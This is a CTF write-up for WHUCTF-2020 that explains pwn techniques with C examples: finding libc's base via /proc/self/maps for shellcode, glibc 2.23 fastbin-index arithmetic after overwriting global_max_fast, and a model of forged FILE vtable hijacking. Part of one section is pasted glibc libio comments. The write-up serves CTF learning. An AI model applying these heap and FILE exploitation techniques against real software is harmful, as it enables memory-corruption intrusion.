# WHUCTF-2020 WriteUp

## #PWN

### #shellcode

#### #Step 2: gather information with the arbitrary file read

/etc/issue tells us the system is Ubuntu 16.04, so the libc is glibc 2.23. Knowing the libc version is not enough to call its functions: we also need libc's base address, and that takes a little knowledge of the /proc filesystem. Reading /proc/self/maps gives the memory map of the current process; the start address of libc's first mapping (file offset 0) is the base address.

#### #Step 3: implement directory reading

• Keep the libc base in one fixed register that is never modified afterwards; here we use rbx.
• Each time a libc function is called, compute its address (base plus the function's offset in this libc build) into a register (here rax), then `call rax`.
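As an added example, not the writeup's shellcode: host-side C that does the two steps above, parsing `/proc/self/maps` text for libc's load base and then adding a symbol offset, which is exactly the base-in-rbx, base-plus-offset-in-rax arithmetic the shellcode performs. The maps text is a constructed sample in the glibc 2.23 / Ubuntu 16.04 layout, the function names are chosen here, and the offset used in `main` is a placeholder rather than a real symbol offset.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Constructed sample of /proc/self/maps for a glibc 2.23 process.
   Addresses, device numbers and inodes are made up for the example. */
static const char SAMPLE_MAPS[] =
    "00400000-00401000 r-xp 00000000 08:01 1234        /home/ctf/chall\n"
    "00600000-00601000 rw-p 00000000 08:01 1234        /home/ctf/chall\n"
    "00602000-00623000 rw-p 00000000 00:00 0           [heap]\n"
    "7ffff7a0d000-7ffff7bcd000 r-xp 00000000 08:01 1050063  /lib/x86_64-linux-gnu/libc-2.23.so\n"
    "7ffff7bcd000-7ffff7dcd000 ---p 001c0000 08:01 1050063  /lib/x86_64-linux-gnu/libc-2.23.so\n"
    "7ffff7dcd000-7ffff7dd1000 r--p 001c0000 08:01 1050063  /lib/x86_64-linux-gnu/libc-2.23.so\n"
    "7ffff7dd1000-7ffff7dd3000 rw-p 001c4000 08:01 1050063  /lib/x86_64-linux-gnu/libc-2.23.so\n"
    "7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:01 1050043  /lib/x86_64-linux-gnu/ld-2.23.so\n"
    "7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0        [stack]\n";

/* True for libc itself (libc-2.23.so, libc.so.6); false for libcrypto,
   libcap and other libraries whose basename merely starts with "libc". */
int is_libc_path(const char *path)
{
    const char *base = strrchr(path, '/');
    base = base ? base + 1 : path;
    return strncmp(base, "libc-", 5) == 0 || strncmp(base, "libc.so", 7) == 0;
}

/* Scan maps text line by line and return the start of the first libc
   mapping whose file offset is 0: the load base that symbol offsets are
   added to. Returns 0 when no libc mapping is present. */
uintptr_t libc_base_from_maps(const char *maps)
{
    const char *p = maps;
    while (*p) {
        char line[512], perms[8], dev[16], path[256] = "";
        unsigned long start, end, off, inode;
        const char *nl = strchr(p, '\n');
        size_t full = nl ? (size_t)(nl - p) : strlen(p);
        size_t len = full < sizeof line ? full : sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        p += full + (nl ? 1 : 0);

        /* fields: range, perms, file offset, dev, inode, optional pathname */
        int n = sscanf(line, "%lx-%lx %7s %lx %15s %lu %255s",
                       &start, &end, perms, &off, dev, &inode, path);
        if (n < 6)
            continue;                        /* not a maps line */
        if (off == 0 && is_libc_path(path))  /* libc's first segment */
            return (uintptr_t)start;
    }
    return 0;
}

/* The per-call step of the shellcode: the base stays in a register that is
   never clobbered (rbx in the writeup), base + offset goes into rax, then
   `call rax`. The offset must come from the target's own libc build. */
uintptr_t libc_func_addr(uintptr_t base, uintptr_t offset)
{
    return base + offset;
}

int main(void)
{
    uintptr_t base = libc_base_from_maps(SAMPLE_MAPS);
    printf("libc base (sample): 0x%lx\n", (unsigned long)base);
    /* 0x1000 is a placeholder offset, not a real symbol offset. */
    printf("base + 0x1000:      0x%lx\n", (unsigned long)libc_func_addr(base, 0x1000));

    /* On a live Linux process the real file is parsed the same way. */
    FILE *f = fopen("/proc/self/maps", "r");
    if (f) {
        static char buf[1 << 16];
        size_t got = fread(buf, 1, sizeof buf - 1, f);
        buf[got] = '\0';
        fclose(f);
        printf("libc base (this process): 0x%lx\n",
               (unsigned long)libc_base_from_maps(buf));
    }
    return 0;
}
```

Matching on the basename rather than on the substring `libc` matters: a plain substring match would pick up libcrypto or libcap first. The mapping to use is the one with file offset 0 (the `r-xp` text segment on glibc 2.23); its start address is the value to keep in rbx.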

### #heaptrick

The edit function contains a non-obvious arbitrary-address write of the value 0xcafebabe; the natural use for it is to overwrite global_max_fast.
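Why overwriting global_max_fast with a huge value is useful, as an added example that is not the writeup's exploit: on glibc 2.23 x86-64, free() puts any chunk with chunksize(p) <= global_max_fast into main_arena.fastbinsY[fastbin_index(size)], and the index is not bounded by NFASTBINS, so the chunk pointer is written to main_arena + 8 + 8 * ((size >> 4) - 2). The functions below compute that slot and its inverse (which chunk size to free in order to hit a chosen address); the main_arena value in main is a constructed placeholder and the function names are chosen here.

```c
#include <stdint.h>
#include <stdio.h>

/* glibc 2.23, x86-64 (malloc/malloc.c): SIZE_SZ == 8, so
   fastbin_index(sz) == (sz >> 4) - 2, and fastbinsY[] begins 8 bytes into
   struct malloc_state, after the 4-byte mutex and 4-byte flags. */
#define SIZE_SZ          8u
#define FASTBINSY_OFFSET 8u
#define SIZE_BITS        7u   /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */

/* chunksize(): strip the flag bits from a chunk's size field. */
static size_t chunksize(size_t size_field)
{
    return size_field & ~(size_t)SIZE_BITS;
}

/* fastbin_index() as in malloc.c; nothing here caps it at NFASTBINS. */
unsigned fastbin_index(size_t sz)
{
    return (unsigned)(sz >> 4) - 2;
}

/* Where free() stores the chunk pointer once chunksize(p) <= global_max_fast:
   &main_arena.fastbinsY[fastbin_index(chunksize(p))]. With global_max_fast
   set to 0xcafebabe this can reach far past the ten real fastbins. */
uintptr_t fastbin_slot_addr(uintptr_t main_arena, size_t size_field)
{
    return main_arena + FASTBINSY_OFFSET
         + (uintptr_t)fastbin_index(chunksize(size_field)) * SIZE_SZ;
}

/* Inverse: the chunk size to free so that its pointer lands on TARGET.
   Returns 0 when TARGET is below fastbinsY or not 8-byte aligned relative
   to it, i.e. when this trick cannot reach it. */
size_t chunk_size_for_target(uintptr_t main_arena, uintptr_t target)
{
    uintptr_t first = main_arena + FASTBINSY_OFFSET;
    if (target < first || (target - first) % SIZE_SZ != 0)
        return 0;
    uintptr_t idx = (target - first) / SIZE_SZ;
    return (size_t)((idx + 2) << 4);
}

int main(void)
{
    /* Placeholder arena address; the real one is libc base + main_arena offset. */
    uintptr_t main_arena = 0x7ffff7dd1b20UL;
    uintptr_t targets[] = { main_arena + 0x20, main_arena + 0xa00, main_arena + 0x21 };

    for (unsigned i = 0; i < sizeof targets / sizeof targets[0]; i++) {
        size_t sz = chunk_size_for_target(main_arena, targets[i]);
        if (sz == 0) {
            printf("target 0x%lx: unreachable (misaligned or below fastbinsY)\n",
                   (unsigned long)targets[i]);
            continue;
        }
        printf("target 0x%lx: free a chunk of size 0x%zx (fastbin index %u) "
               "-> slot 0x%lx\n",
               (unsigned long)targets[i], sz, fastbin_index(sz),
               (unsigned long)fastbin_slot_addr(main_arena, sz | 1));
    }
    return 0;
}
```

Two caveats a practitioner hits when using this: the value written is the freed chunk's address (a heap pointer, not a controlled value), and the old contents of the slot are copied into the chunk's fd; and before taking the fastbin path, glibc 2.23 free() still checks the size field of the chunk that follows p (at p + size), which must be greater than 2*SIZE_SZ and less than av->system_mem, so a plausible size word has to be planted that far into the heap.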

libio/strops.c

### #overflow

#### #finish

The 'finish' function does any final cleaning up of an _IO_FILE object. It does not delete (free) it, but does everything else to finalize it. It matches the streambuf::~streambuf virtual destructor.

#### #overflow

The 'overflow' hook flushes the buffer. The second argument is a character, or EOF. It matches the streambuf::overflow virtual function.

#### #underflow

The 'underflow' hook tries to fill the get buffer. It returns the next character (as an unsigned char) or EOF. The next character remains in the get buffer, and the get position is not changed. It matches the streambuf::underflow virtual function.

#### #uflow

The 'uflow' hook returns the next character in the input stream (cast to unsigned char), and increments the read position; EOF is returned on failure. It matches the streambuf::uflow virtual function, which is not in the cfront implementation, but was added to C++ by the ANSI/ISO committee.

#### #pbackfail

The 'pbackfail' hook handles backing up. It matches the streambuf::pbackfail virtual function.

#### #xsputn

The 'xsputn' hook writes up to N characters from buffer DATA. Returns EOF or the number of characters actually written. It matches the streambuf::xsputn virtual function.

#### #xsgetn

The 'xsgetn' hook reads up to N characters into buffer DATA. Returns the number of characters actually read. It matches the streambuf::xsgetn virtual function.

#### #seekoff

The 'seekoff' hook moves the stream position to a new position relative to the start of the file (if DIR==0, SEEK_SET), the current position (DIR==1, SEEK_CUR), or the end of the file (DIR==2, SEEK_END). It matches the streambuf::seekoff virtual function. It is also used for the ANSI fseek function.

#### #seekpos

The 'seekpos' hook also moves the stream position, but to an absolute position given by a fpos64_t (seekpos). It matches the streambuf::seekpos virtual function. It is also used for the ANSI fgetpos and fsetpos functions.

#### #setbuf

The 'setbuf' hook gives a buffer to the file. It matches the streambuf::setbuf virtual function.

#### #sync

The 'sync' hook attempts to synchronize the internal data structures of the file with the external state. It matches the streambuf::sync virtual function.

#### #doallocate

The 'doallocate' hook is used to tell the file to allocate a buffer. It matches the streambuf::doallocate virtual function, which is not in the ANSI/ISO C++ standard, but is part of traditional implementations.

#### #sysread

The 'sysread' hook is used to read data from the external file into an existing buffer. It generalizes the Unix read(2) function. It matches the streambuf::sys_read virtual function, which is specific to this implementation.

#### #syswrite

The 'syswrite' hook is used to write data from an existing buffer to an external file. It generalizes the Unix write(2) function. It matches the streambuf::sys_write virtual function, which is specific to this implementation.

#### #sysseek

The 'sysseek' hook is used to re-position an external file. It generalizes the Unix lseek(2) function. It matches the streambuf::sys_seek virtual function, which is specific to this implementation.

#### #sysclose

The 'sysclose' hook is used to finalize (close, finish up) an external file. It generalizes the Unix close(2) function. It matches the streambuf::sys_close virtual function, which is specific to this implementation.

#### #sysstat

The 'sysstat' hook is used to get information about an external file into a struct stat buffer. It generalizes the Unix fstat(2) call. It matches the streambuf::sys_stat virtual function, which is specific to this implementation.

#### #showmany

The 'showmany' hook can be used to get an idea of how much input is available. In many cases the answer will be 0, which means unknown, but in some cases one can provide real information.

#### #imbue

The 'imbue' hook is used to get information about the currently installed locales.
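As an added example (not from the writeup), a userland model of how glibc reaches these hooks: the struct below mirrors the real `_IO_jump_t` field order, so the slot offsets match x86-64 glibc 2.23 (`__overflow` at 0x18, the vtable pointer at 0xd8 in `_IO_FILE_plus`), and the two dispatch functions contrast the unchecked 2.23 call with the `IO_validate_vtable` range check added in glibc 2.24. The check's abort is modelled as a -1 return, and the `fake_file`, `evil_overflow` and `forged_overflow_fires` names are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Mirror of struct _IO_jump_t (libio/libioP.h, glibc 2.23), hooks in their
   real order. _IO_OVERFLOW(fp, ch) expands to a call through the __overflow
   slot of the vtable that fp->vtable points to. */
struct fake_file;                      /* stands in for struct _IO_FILE_plus */
typedef int  (*overflow_fn)(struct fake_file *, int);
typedef void (*generic_fn)(void);

struct io_jump_t {
    size_t      dummy, dummy2;
    generic_fn  finish;
    overflow_fn overflow;
    generic_fn  underflow, uflow, pbackfail, xsputn, xsgetn, seekoff, seekpos,
                setbuf, sync, doallocate, read, write, seek, close, stat,
                showmanyc, imbue;
};

struct fake_file {
    char                    file[0xd8]; /* sizeof(struct _IO_FILE) on x86-64 glibc 2.23 */
    const struct io_jump_t *vtable;     /* _IO_FILE_plus.vtable */
};

static int hooked_calls;               /* how often the attacker's slot ran */
static int evil_overflow(struct fake_file *fp, int ch)   { (void)fp; hooked_calls++; return ch; }
static int benign_overflow(struct fake_file *fp, int ch) { (void)fp; return ch; }

/* The one legitimate vtable, standing in for the __libc_IO_vtables section. */
static const struct io_jump_t io_file_jumps = { .overflow = benign_overflow };

/* glibc 2.23: JUMP2(__overflow, fp, ch). Wherever fp->vtable points, the
   slot at offset 0x18 is called. */
int io_overflow_2_23(struct fake_file *fp, int ch)
{
    return fp->vtable->overflow(fp, ch);
}

/* glibc >= 2.24: IO_validate_vtable() first checks that the pointer lies
   inside the __libc_IO_vtables section; otherwise _IO_vtable_check() runs
   and, absent a registered foreign vtable, aborts. Modelled as return -1. */
int io_overflow_2_24(struct fake_file *fp, int ch)
{
    uintptr_t vt = (uintptr_t)fp->vtable;
    uintptr_t lo = (uintptr_t)&io_file_jumps, hi = lo + sizeof io_file_jumps;
    if (vt < lo || vt >= hi)
        return -1;                     /* glibc would abort here */
    return fp->vtable->overflow(fp, ch);
}

/* The shape of a 2.23 FILE attack: attacker memory holding a forged vtable
   whose __overflow slot is the payload, and a fake FILE pointing at it.
   Returns 1 if the payload ran through DISPATCH, 0 if it was blocked. */
int forged_overflow_fires(int (*dispatch)(struct fake_file *, int))
{
    struct io_jump_t forged = { .overflow = evil_overflow };
    struct fake_file fp = { .vtable = &forged };
    int before = hooked_calls;
    dispatch(&fp, 'A');
    return hooked_calls - before;
}

/* A genuine stream keeps working under both versions. */
int legit_overflow_result(int (*dispatch)(struct fake_file *, int))
{
    struct fake_file fp = { .vtable = &io_file_jumps };
    return dispatch(&fp, 'B');
}

int main(void)
{
    printf("__overflow slot offset: 0x%zx, vtable at _IO_FILE_plus+0x%zx, "
           "sizeof(_IO_jump_t) = 0x%zx\n",
           offsetof(struct io_jump_t, overflow),
           offsetof(struct fake_file, vtable), sizeof(struct io_jump_t));
    printf("forged vtable fires on 2.23: %d, on 2.24+: %d\n",
           forged_overflow_fires(io_overflow_2_23),
           forged_overflow_fires(io_overflow_2_24));
    return 0;
}
```

The 2.24 check is only a range test over the whole vtable section, not a check that the pointer is a particular vtable or even slot-aligned; vtables that live inside the section, such as the string-stream ones in libio/strops.c, still pass it.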

## #MISC

(Cookie-cutter challenges; just apply the usual templates.)

### #wechat_game

The contents of the files under the text folder look reversed (they are; recent CTFs keep reusing this trick). After reversing them back, simply search for the flag string.